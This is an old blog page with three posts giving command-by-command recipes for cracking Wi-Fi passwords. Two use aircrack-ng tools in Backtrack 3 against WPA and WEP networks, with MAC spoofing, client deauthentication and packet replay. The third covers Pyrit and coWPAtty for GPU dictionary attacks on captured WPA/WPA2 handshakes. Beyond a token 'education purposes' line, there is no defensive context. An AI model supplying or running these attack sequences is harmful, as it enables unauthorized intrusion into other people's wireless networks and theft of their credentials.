Loading
Showing posts with label crack. Show all posts
Showing posts with label crack. Show all posts

Sunday, November 29, 2009

HowTo: Crack WPA with Backtrack 3



This is an easy to follow tutorial on how to crack a WPA encrypted password. This information should only be used for education purposes.

Steps:
  1. airmon-ng stop wlan0
  2. ifconfig wlan0 down
  3. macchanger --mac 00:11:22:33:44:55 wlan0
  4. airmon-ng start wlan0
  5. airodump-ng wlan0
  6. airodump-ng -c (channel) -w (file name) --bssid (bssid) wlan0
  7. aireplay-ng -0 5 -a (bssid)wlan0
  8. aircrack-ng (filename-01.cap)-w (dictionary location)

HowTo: Crack WEP with BackTrack 3



This is a tutorial on how to crack a wep encrypted password. This information should only be used for education purposes.

Steps:
  1. airmon-ng stop wlan0
  2. ifconfig wlan0 down
  3. macchanger --mac 00:11:22:33:44:55 wlan0
  4. airmon-ng start wlan0
  5. airodump-ng wlan0
  6. airodump-ng -c (channel) -w (file name) --bssid (bssid) wlan0
  7. aireplay-ng -1 0 -a (bssid) -h 00:11:22:33:44:55 wlan0
  8. aireplay-ng -3 -b (bssid) -h 00:11:22:33:44:55 wlan0
  9. aircrack-ng -b (bssid) (filename-01.cap)

Saturday, November 28, 2009

Wireless WPA/WPA2-PSK GPU Cracking with Pyrit - How to Use Pyrit in BackTrack

Pyrit is a GPU cracker for attacking WPA/WPA2 PSK protocols. It allows to create massive databases, pre-computing part of the WPA/WPA2-PSK authentication phase in a space-time-tradeoff.  Pyrit works with many platforms including CUDA, ATI-Stream, OpenCL and VIA Padlock.

How to
Listing available cores
pyrit list_cores


Determining performance of cores
pyrit benchmark


Create a new ESSID
pyrit -e Linksys create_essid
Import list of passwords
pyrit -f dict.txt import_passwords

 Start Batch Processing
pyrit batch


Cracking WPA/WPA2-PSK using pyrit/coWPAtty
pyrit -e “Linksys” -f dict.txt passthrough | cowpatty -d – -r wpa2handshake.cap -s “Linksys“
“-e” ESSID for the command
“-f” Filename for the command (’-’ is stdin/stdout)
“-d” Hash file
“-” Accept words on stdin
“-r” Packet capture file
“-s” Network SSID